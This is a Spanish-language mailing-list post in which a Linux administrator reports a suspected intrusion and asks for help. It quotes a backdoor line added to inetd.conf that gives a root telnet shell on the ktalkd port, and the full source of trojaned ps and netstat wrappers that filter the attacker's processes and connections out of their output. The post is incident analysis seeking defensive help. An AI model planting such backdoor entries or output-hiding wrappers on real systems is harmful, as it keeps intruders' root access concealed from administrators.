[Previo por Fecha] [Siguiente por Fecha] [Previo por Hilo] [Siguiente por Hilo]
[Hilos de Discusión] [Fecha] [Tema] [Autor]Yo nuevamente lista. Les decía que en el log secure encontre una conexion telnet desde un servidor ubicado en la red local ... bueno resulta que encontré que ha esa misma hora aparecen como modificados los siguientes archivos: inetd.conf en el cual pude notar se añadió la siguiente línea: ktalkd stream tcp nowait root /usr/sbin/tcpd in.telnetd que es ktalkd? Además me pude percatar que los archivos ps y netstat (dentro de /usr/bin) aparecen modificados en tiempos muy cercanos uno del otro y contienen lo siguiente: Archvio PS ------------ #!/bin/sh # #psX By:syg /bin/.ps $1 > ~/.pstmp cat ~/.pstmp | egrep -v "final | /bin/" >> ~/.pstmp1 mv ~/.pstmp ~/.pstmp >> /dev/null 2 > &1 cat ~/.pstmp rm -fr ~/.pstmp > /dev/null 2 > &1 Archivo Netstat ---------------- #!/bin/sh #netstatX By:syg /bin/.netstat $1 $2 $3 $4 $5 $6 $7 $8 $9 > ~/.net cat ~/.net | egrep -v "519 | ktalkd | dial | 62.11|vuoto|vuoto1|vuoto2|vuoto3|vuoto4" > ~/.net2 mv ~/.net2 ~/.net >> /dev/null 2 > &1 cat ~/.net Me gustaría saber si ven algo anormal en estos archivos o si pueden explicarme que hacen los mismos? -- Para desuscribirse, mande correo a: ayuda-unsubscribe en linux org mx Para comandos adicionales, envíelo a: ayuda-help en linux org mx